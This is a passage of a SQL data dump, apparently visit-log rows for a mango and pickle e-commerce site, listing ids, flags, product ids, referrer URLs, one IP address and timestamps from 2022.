22:09:27'),(1178,0,0,1,1116,21,'','3.110.242.160','','','','2022-04-27 22:09:29'),(1179,0,0,1,1170,21,'','3.110.242.160','','','','2022-04-27 22:09:30'),(1180,0,1,0,0,21,'','3.110.242.160','','','','2022-04-27 22:09:32'),(1181,0,1,0,0,21,'','3.110.242.160','','','','2022-04-27 22:09:33'),(1182,0,0,1,1086,21,'','3.110.242.160','','','','2022-04-27 22:09:34'),(1183,0,0,1,1111,21,'','3.110.242.160','','','','2022-04-27 22:09:36'),(1184,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:32'),(1185,0,0,1,1145,21,'','3.110.242.160','','','','2022-04-28 02:31:33'),(1186,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:34'),(1187,0,0,1,1092,21,'','3.110.242.160','','','','2022-04-28 02:31:36'),(1188,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:37'),(1189,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:38'),(1190,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:39'),(1191,0,0,1,1114,21,'','3.110.242.160','','','','2022-04-28 02:31:40'),(1192,9,0,0,36,1,'','3.110.242.160','','','','2022-04-28 02:31:41'),(1193,9,0,0,130,1,'','3.110.242.160','','','','2022-04-28 02:31:43'),(1194,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:45'),(1195,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:47'),(1196,9,0,0,37,1,'','3.110.242.160','','','','2022-04-28 02:31:48'),(1197,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:49'),(1198,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 02:31:51'),(1199,0,0,1,1146,21,'','3.110.242.160','','','','2022-04-28 02:31:52'),(1200,0,0,1,1084,21,'','3.110.242.160','','','','2022-04-28 02:31:53'),(1201,0,0,1,1083,21,'','3.110.242.160','','','','2022-04-28 02:31:56'),(1202,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 09:31:48'),(1203,1,0,0,0,21,'','3.110.242.160','','','','2022-04-28 09:31:51'),(1204,0,0,1,1085,21,'','3.110.242.160','','','','2022-04-28 09:31:53'),(1205,0,0,1,1117,21,'','3.110.242.160','','','','2022-04-28 09:31:55'),(1206,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 09:31:56'),(1207,0,0,1,1102,21,'','3.110.242.160','','','','2022-04-28 09:31:57'),(1208,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 09:32:00'),(1209,0,1,0,0,21,'','3.110.242.160','','','','2022-04-28 09:32:05'),(1210,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-28 21:54:03'),(1211,0,0,1,1289,21,'','3.110.242.160','','','','2022-04-28 21:54:20'),(1212,9,0,0,130,1,'','3.110.242.160','','','','2022-04-28 21:54:23'),(1213,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-04-29 16:23:15'),(1214,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-01 10:37:41'),(1215,1,0,0,0,21,'','3.110.242.160','','','','2022-05-01 15:32:58'),(1216,0,0,1,1114,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:45'),(1217,0,0,1,1116,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:47'),(1218,0,0,1,1097,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:48'),(1219,0,0,1,1263,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:50'),(1220,0,0,1,1287,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:51'),(1221,0,0,1,1288,21,'https://www.google.com','3.110.242.160','','','','2022-05-03 13:30:54'),(1222,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-03 17:03:05'),(1223,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-05 14:10:45'),(1224,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-05 22:46:16'),(1225,0,0,1,1126,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/','3.110.242.160','','','','2022-05-05 22:46:34'),(1226,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-05 22:47:46'),(1227,0,0,1,1288,21,'https://mangomitra.in/product/sendura-mango-3kg/','3.110.242.160','','','','2022-05-05 22:48:22'),(1228,0,0,1,1137,21,'https://mangomitra.in/product/ratnagiri-alphonso-3-dozen/','3.110.242.160','','','','2022-05-05 22:48:53'),(1229,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-06 17:39:03'),(1230,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-07 03:36:13'),(1231,1,0,0,0,21,'','3.110.242.160','','','','2022-05-07 05:39:55'),(1232,0,0,1,1069,21,'https://mangomitra.in/product/appemidi-5kg','3.110.242.160','','','','2022-05-07 05:40:01'),(1233,1,0,0,0,21,'','3.110.242.160','','','','2022-05-08 16:08:51'),(1234,0,0,1,1111,21,'','3.110.242.160','','','','2022-05-10 10:51:15'),(1235,0,0,1,1117,21,'','3.110.242.160','','','','2022-05-10 19:28:54'),(1236,0,0,1,1117,21,'','3.110.242.160','','','','2022-05-11 01:13:27'),(1237,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-12 08:17:59'),(1238,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-12 16:16:14'),(1239,0,0,1,1117,21,'','3.110.242.160','','','','2022-05-12 18:25:38'),(1240,0,0,1,1128,21,'https://mangomitra.in/product/sendura-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:40'),(1241,0,0,1,1289,21,'https://mangomitra.in/product/ratnagiri-alphonso-6-dozen','3.110.242.160','','','','2022-05-12 19:12:40'),(1242,0,0,1,1097,21,'https://mangomitra.in/product/raw-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:41'),(1243,0,0,1,1165,21,'https://mangomitra.in/product/chhunda-or-gujarati-sweet-mango-pickle-250gm','3.110.242.160','','','','2022-05-12 19:12:41'),(1244,0,0,1,1141,21,'https://mangomitra.in/product/langra-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:42'),(1245,0,0,1,1288,21,'https://mangomitra.in/product/ratnagiri-alphonso-3-dozen','3.110.242.160','','','','2022-05-12 19:12:42'),(1246,9,0,0,35,1,'https://mangomitra.in/product-category/mangoes','3.110.242.160','','','','2022-05-12 19:12:42'),(1247,0,0,1,1287,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen','3.110.242.160','','','','2022-05-12 19:12:43'),(1248,0,0,1,1159,21,'https://mangomitra.in/product/mango-solapur-pickle','3.110.242.160','','','','2022-05-12 19:12:43'),(1249,0,0,1,1109,21,'https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-2l','3.110.242.160','','','','2022-05-12 19:12:43'),(1250,0,0,1,1137,21,'https://mangomitra.in/product/malgova-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:44'),(1251,0,0,1,1126,21,'https://mangomitra.in/product/hapus-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:44'),(1252,0,0,1,1167,21,'https://mangomitra.in/product/mango-cut-pickle-500gm','3.110.242.160','','','','2022-05-12 19:12:44'),(1253,9,0,0,130,1,'https://mangomitra.in/product-category/deal-of-the-day','3.110.242.160','','','','2022-05-12 19:12:45'),(1254,0,0,1,1086,21,'https://mangomitra.in/product/ratnagiri-alphonso-3kg','3.110.242.160','','','','2022-05-12 19:12:45'),(1255,9,0,0,37,1,'https://mangomitra.in/product-category/pickle-mangoes','3.110.242.160','','','','2022-05-12 19:12:45'),(1256,0,0,1,1123,21,'https://mangomitra.in/product/neelam-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:45'),(1257,0,0,1,1122,21,'https://mangomitra.in/product/neelam-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:46'),(1258,0,0,1,1111,21,'https://mangomitra.in/product/paper-boat-aamras-tetrapack-1l','3.110.242.160','','','','2022-05-12 19:12:46'),(1259,9,0,0,36,1,'https://mangomitra.in/product-category/pickles','3.110.242.160','','','','2022-05-12 19:12:46'),(1260,0,0,1,1116,21,'https://mangomitra.in/product/banginapalli-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:47'),(1261,0,0,1,1264,21,'https://mangomitra.in/product/badami-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:47'),(1262,0,0,1,1169,21,'https://mangomitra.in/product/mango-thokku-500gm','3.110.242.160','','','','2022-05-12 19:12:47'),(1263,0,0,1,1114,21,'https://mangomitra.in/product/banginapalli-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:48'),(1264,0,0,1,1263,21,'https://mangomitra.in/product/raw-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:48'),(1265,9,0,0,129,1,'https://mangomitra.in/brand/srinivasapura','3.110.242.160','','','','2022-05-12 19:12:49'),(1266,0,0,1,1134,21,'https://mangomitra.in/product/himasagar-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:49'),(1267,9,0,0,77,1,'https://mangomitra.in/product-category/mango-juices','3.110.242.160','','','','2022-05-12 19:12:49'),(1268,0,0,1,1129,21,'https://mangomitra.in/product/sendura-mango-5kg','3.110.242.160','','','','2022-05-12 19:12:50'),(1269,0,0,1,1170,21,'https://mangomitra.in/product/sweet-mango-pickle-2','3.110.242.160','','','','2022-05-12 19:12:50'),(1270,0,0,1,1119,21,'https://mangomitra.in/product/totapuri-mango-3kg','3.110.242.160','','','','2022-05-12 19:12:51'),(1271,9,0,0,127,1,'https://mangomitra.in/brand/kanakapura','3.110.242.160','','','','2022-05-12 19:12:51'),(1272,0,0,1,1120,21,'https://mangomitra.in/product/totapuri-mango-5kg-2','3.110.242.160','','','','2022-05-12 19:12:51'),(1273,0,0,1,1117,21,'','3.110.242.160','','','','2022-05-13 08:17:04'),(1274,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-15 17:09:00'),(1275,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-17 20:44:48'),(1276,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-22 05:14:35'),(1277,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-22 16:39:25'),(1278,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:06'),(1279,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:10'),(1280,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:13'),(1281,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:18'),(1282,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:20'),(1283,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:22'),(1284,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:25'),(1285,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:27'),(1286,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:29'),(1287,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:31'),(1288,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:36'),(1289,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:40'),(1290,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:47'),(1291,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:52'),(1292,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 02:59:57'),(1293,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:02'),(1294,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:08'),(1295,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:12'),(1296,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:17'),(1297,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:19'),(1298,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:22'),(1299,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:23'),(1300,0,0,1,1125,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:25'),(1301,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:28'),(1302,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:30'),(1303,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:32'),(1304,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:34'),(1305,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:36'),(1306,0,0,1,1129,21,'https://mangomitra.in/','3.110.242.160','','','','2022-05-23 03:00:39'),(1307,0,0,1,1161,21,'','3.110.242.160','','','','2022-05-23 15:28:09'),(1308,0,0,1,1161,21,'','3.110.242.160','','','','2022-05-23 19:11:44'),(1309,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-24 21:20:57'),(1310,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-05-28 17:22:30'),(1311,0,0,1,1287,21,'','3.110.242.160','','','','2022-05-28 18:23:34'),(1312,0,0,1,1289,21,'','3.110.242.160','','','','2022-05-28 18:23:50'),(1313,9,0,0,130,1,'','3.110.242.160','','','','2022-05-28 18:23:54'),(1314,1,0,0,0,21,'http://www.google.com.hk','3.110.242.160','','','','2022-05-31 03:59:56'),(1315,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-01 08:27:16'),(1316,0,0,1,1097,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-06-01 08:27:49'),(1317,0,0,1,1093,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-06-01 08:28:16'),(1318,0,0,1,1082,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-06-01 08:28:29'),(1319,9,0,0,127,1,'','3.110.242.160','','','','2022-06-02 04:01:41'),(1320,9,0,0,128,1,'','3.110.242.160','','','','2022-06-02 04:01:42'),(1321,9,0,0,129,1,'','3.110.242.160','','','','2022-06-02 04:01:47'),(1322,9,0,0,130,1,'','3.110.242.160','','','','2022-06-02 04:02:26'),(1323,9,0,0,35,1,'','3.110.242.160','','','','2022-06-02 04:02:41'),(1324,9,0,0,77,1,'','3.110.242.160','','','','2022-06-02 04:02:42'),(1325,9,0,0,38,1,'','3.110.242.160','','','','2022-06-02 04:02:42'),(1326,9,0,0,37,1,'','3.110.242.160','','','','2022-06-02 04:02:43'),(1327,9,0,0,36,1,'','3.110.242.160','','','','2022-06-02 04:02:43'),(1328,1,0,0,0,21,'','3.110.242.160','','','','2022-06-04 02:55:42'),(1329,0,0,1,1069,21,'https://mangomitra.in/product/appemidi-5kg','3.110.242.160','','','','2022-06-04 02:55:54'),(1330,1,0,0,0,21,'','3.110.242.160','','','','2022-06-06 04:37:28'),(1331,9,0,0,130,1,'','3.110.242.160','','','','2022-06-10 12:50:25'),(1332,9,0,0,35,1,'','3.110.242.160','','','','2022-06-10 12:50:26'),(1333,9,0,0,36,1,'','3.110.242.160','','','','2022-06-10 12:50:27'),(1334,9,0,0,37,1,'','3.110.242.160','','','','2022-06-10 12:50:28'),(1335,9,0,0,38,1,'','3.110.242.160','','','','2022-06-10 12:50:29'),(1336,9,0,0,77,1,'','3.110.242.160','','','','2022-06-10 12:50:31'),(1337,0,0,1,1289,21,'','3.110.242.160','','','','2022-06-10 12:50:33'),(1338,0,0,1,1288,21,'','3.110.242.160','','','','2022-06-10 12:50:34'),(1339,0,0,1,1287,21,'','3.110.242.160','','','','2022-06-10 12:50:35'),(1340,0,0,1,1111,21,'','3.110.242.160','','','','2022-06-12 11:52:51'),(1341,0,0,1,1129,21,'','3.110.242.160','','','','2022-06-13 04:16:53'),(1342,0,0,1,1137,21,'','3.110.242.160','','','','2022-06-13 20:16:41'),(1343,9,0,0,129,1,'','3.110.242.160','','','','2022-06-14 18:24:17'),(1344,9,0,0,130,1,'','3.110.242.160','','','','2022-06-15 14:37:09'),(1345,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:37:21'),(1346,9,0,0,36,1,'','3.110.242.160','','','','2022-06-15 14:37:34'),(1347,9,0,0,77,1,'','3.110.242.160','','','','2022-06-15 14:37:46'),(1348,0,0,1,1263,21,'','3.110.242.160','','','','2022-06-15 14:38:40'),(1349,0,0,1,1097,21,'','3.110.242.160','','','','2022-06-15 14:38:52'),(1350,0,0,1,1264,21,'','3.110.242.160','','','','2022-06-15 14:39:03'),(1351,0,0,1,1159,21,'','3.110.242.160','','','','2022-06-15 14:39:16'),(1352,0,0,1,1161,21,'','3.110.242.160','','','','2022-06-15 14:39:29'),(1353,0,0,1,1163,21,'','3.110.242.160','','','','2022-06-15 14:39:41'),(1354,0,0,1,1165,21,'','3.110.242.160','','','','2022-06-15 14:39:54'),(1355,0,0,1,1169,21,'','3.110.242.160','','','','2022-06-15 14:40:06'),(1356,0,0,1,1170,21,'','3.110.242.160','','','','2022-06-15 14:40:19'),(1357,0,0,1,1117,21,'','3.110.242.160','','','','2022-06-15 14:40:32'),(1358,0,0,1,1122,21,'','3.110.242.160','','','','2022-06-15 14:40:44'),(1359,0,0,1,1125,21,'','3.110.242.160','','','','2022-06-15 14:40:57'),(1360,0,0,1,1128,21,'','3.110.242.160','','','','2022-06-15 14:41:10'),(1361,0,0,1,1129,21,'','3.110.242.160','','','','2022-06-15 14:41:22'),(1362,0,0,1,1131,21,'','3.110.242.160','','','','2022-06-15 14:41:35'),(1363,0,0,1,1132,21,'','3.110.242.160','','','','2022-06-15 14:41:47'),(1364,0,0,1,1134,21,'','3.110.242.160','','','','2022-06-15 14:42:00'),(1365,0,0,1,1135,21,'','3.110.242.160','','','','2022-06-15 14:42:13'),(1366,0,0,1,1138,21,'','3.110.242.160','','','','2022-06-15 14:42:25'),(1367,9,0,0,85,1,'','3.110.242.160','','','','2022-06-15 14:42:48'),(1368,0,0,1,1084,21,'','3.110.242.160','','','','2022-06-15 14:43:12'),(1369,9,0,0,128,1,'','3.110.242.160','','','','2022-06-15 14:43:24'),(1370,9,0,0,129,1,'','3.110.242.160','','','','2022-06-15 14:43:36'),(1371,9,0,0,130,1,'','3.110.242.160','','','','2022-06-15 14:44:24'),(1372,9,0,0,130,1,'','3.110.242.160','','','','2022-06-15 14:44:36'),(1373,0,0,1,1146,21,'','3.110.242.160','','','','2022-06-15 14:44:49'),(1374,0,0,1,1083,21,'','3.110.242.160','','','','2022-06-15 14:45:01'),(1375,0,0,1,1143,21,'','3.110.242.160','','','','2022-06-15 14:45:13'),(1376,0,0,1,1088,21,'','3.110.242.160','','','','2022-06-15 14:45:26'),(1377,0,0,1,1089,21,'','3.110.242.160','','','','2022-06-15 14:45:38'),(1378,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:45:50'),(1379,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:46:02'),(1380,0,0,1,1082,21,'','3.110.242.160','','','','2022-06-15 14:46:15'),(1381,0,0,1,1092,21,'','3.110.242.160','','','','2022-06-15 14:46:28'),(1382,0,0,1,1093,21,'','3.110.242.160','','','','2022-06-15 14:46:39'),(1383,0,0,1,1100,21,'','3.110.242.160','','','','2022-06-15 14:46:51'),(1384,0,0,1,1107,21,'','3.110.242.160','','','','2022-06-15 14:47:04'),(1385,0,0,1,1263,21,'','3.110.242.160','','','','2022-06-15 14:47:17'),(1386,0,0,1,1097,21,'','3.110.242.160','','','','2022-06-15 14:47:29'),(1387,0,0,1,1097,21,'','3.110.242.160','','','','2022-06-15 14:47:41'),(1388,0,0,1,1091,21,'','3.110.242.160','','','','2022-06-15 14:47:53'),(1389,0,0,1,1141,21,'','3.110.242.160','','','','2022-06-15 14:48:06'),(1390,0,0,1,1086,21,'','3.110.242.160','','','','2022-06-15 14:48:18'),(1391,0,0,1,1102,21,'','3.110.242.160','','','','2022-06-15 14:48:30'),(1392,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:49:05'),(1393,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:49:18'),(1394,9,0,0,35,1,'','3.110.242.160','','','','2022-06-15 14:49:30'),(1395,1,0,0,0,21,'','3.110.242.160','','','','2022-06-16 08:29:02'),(1396,9,0,0,130,1,'','3.110.242.160','','','','2022-06-16 12:49:28'),(1397,0,0,1,1169,21,'','3.110.242.160','','','','2022-06-16 14:35:45'),(1398,0,0,1,1134,21,'','3.110.242.160','','','','2022-06-17 00:42:41'),(1399,0,0,1,1128,21,'','3.110.242.160','','','','2022-06-17 01:34:54'),(1400,0,0,1,1114,21,'','3.110.242.160','','','','2022-06-17 15:23:32'),(1401,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:17'),(1402,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:27'),(1403,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:29'),(1404,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:31'),(1405,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:32'),(1406,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:33'),(1407,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:34'),(1408,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:35'),(1409,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:37'),(1410,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:38'),(1411,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:40'),(1412,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:43'),(1413,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:45'),(1414,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:48'),(1415,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:51'),(1416,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:54'),(1417,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:17:57'),(1418,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:01'),(1419,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:04'),(1420,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:05'),(1421,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:06'),(1422,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:07'),(1423,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:08'),(1424,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:09'),(1425,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:10'),(1426,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:11'),(1427,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:12'),(1428,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:13'),(1429,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:15'),(1430,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:16'),(1431,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:17'),(1432,0,0,1,1129,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:19'),(1433,0,0,1,1131,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:21'),(1434,0,0,1,1132,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:23'),(1435,0,0,1,1134,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:25'),(1436,0,0,1,1135,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:27'),(1437,0,0,1,1137,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:29'),(1438,9,0,0,129,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:30'),(1439,0,0,1,1138,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:31'),(1440,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:33'),(1441,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:35'),(1442,0,0,1,1084,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:37'),(1443,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:38'),(1444,0,0,1,1125,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:39'),(1445,0,0,1,1100,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:41'),(1446,0,0,1,1141,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-17 21:18:42'),(1447,0,0,1,1264,21,'','3.110.242.160','','','','2022-06-17 23:43:42'),(1448,0,0,1,1125,21,'','3.110.242.160','','','','2022-06-18 00:32:50'),(1449,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-18 11:01:52'),(1450,1,0,0,0,21,'https://mangomitra.in/product/ratnagiri-alphonso-3-dozen/','3.110.242.160','','','','2022-06-18 11:02:31'),(1451,0,1,0,0,21,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-06-18 11:02:40'),(1452,9,0,0,35,1,'','3.110.242.160','','','','2022-06-18 22:03:15'),(1453,0,0,1,1084,21,'','3.110.242.160','','','','2022-06-20 01:32:37'),(1454,1,0,0,0,21,'','3.110.242.160','','','','2022-06-20 01:34:39'),(1455,0,1,0,0,21,'','3.110.242.160','','','','2022-06-20 01:34:49'),(1456,9,0,0,128,1,'','3.110.242.160','','','','2022-06-20 01:34:51'),(1457,9,0,0,127,1,'','3.110.242.160','','','','2022-06-20 01:34:56'),(1458,0,0,1,1069,21,'','3.110.242.160','','','','2022-06-20 01:34:58'),(1459,9,0,0,129,1,'','3.110.242.160','','','','2022-06-20 01:34:59'),(1460,0,0,1,1263,21,'','3.110.242.160','','','','2022-06-20 01:35:02'),(1461,9,0,0,85,1,'','3.110.242.160','','','','2022-06-20 01:35:05'),(1462,9,0,0,35,1,'','3.110.242.160','','','','2022-06-20 01:35:06'),(1463,0,0,1,1264,21,'','3.110.242.160','','','','2022-06-20 01:35:09'),(1464,0,0,1,1125,21,'','3.110.242.160','','','','2022-06-20 01:35:11'),(1465,0,0,1,1093,21,'','3.110.242.160','','','','2022-06-20 01:35:14'),(1466,0,0,1,1137,21,'','3.110.242.160','','','','2022-06-20 01:35:16'),(1467,0,0,1,1131,21,'','3.110.242.160','','','','2022-06-20 01:35:18'),(1468,0,0,1,1135,21,'','3.110.242.160','','','','2022-06-20 01:35:20'),(1469,9,0,0,36,1,'','3.110.242.160','','','','2022-06-20 01:35:21'),(1470,0,0,1,1120,21,'','3.110.242.160','','','','2022-06-20 01:35:22'),(1471,9,0,0,77,1,'','3.110.242.160','','','','2022-06-20 01:35:24'),(1472,9,0,0,37,1,'','3.110.242.160','','','','2022-06-20 01:35:25'),(1473,9,0,0,130,1,'','3.110.242.160','','','','2022-06-20 01:35:27'),(1474,0,0,1,1288,21,'','3.110.242.160','','','','2022-06-20 01:35:28'),(1475,0,0,1,1287,21,'','3.110.242.160','','','','2022-06-20 01:35:30'),(1476,0,0,1,1289,21,'','3.110.242.160','','','','2022-06-20 01:35:33'),(1477,9,0,0,38,1,'','3.110.242.160','','','','2022-06-20 01:35:34'),(1478,0,0,1,1163,21,'','3.110.242.160','','','','2022-06-20 01:35:35'),(1479,0,0,1,1145,21,'','3.110.242.160','','','','2022-06-20 02:18:56'),(1480,0,0,1,1083,21,'','3.110.242.160','','','','2022-06-20 02:19:36'),(1481,0,0,1,1095,21,'','3.110.242.160','','','','2022-06-20 02:19:40'),(1482,0,0,1,1100,21,'','3.110.242.160','','','','2022-06-20 02:36:38'),(1483,0,0,1,1091,21,'','3.110.242.160','','','','2022-06-20 02:53:31'),(1484,0,0,1,1086,21,'','3.110.242.160','','','','2022-06-20 02:59:31'),(1485,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-06-20 10:46:07'),(1486,0,0,1,1093,21,'https://www.google.com/','3.110.242.160','','','','2022-06-20 16:20:18'),(1487,0,0,1,1109,21,'https://mangomitra.in','3.110.242.160','','','','2022-06-21 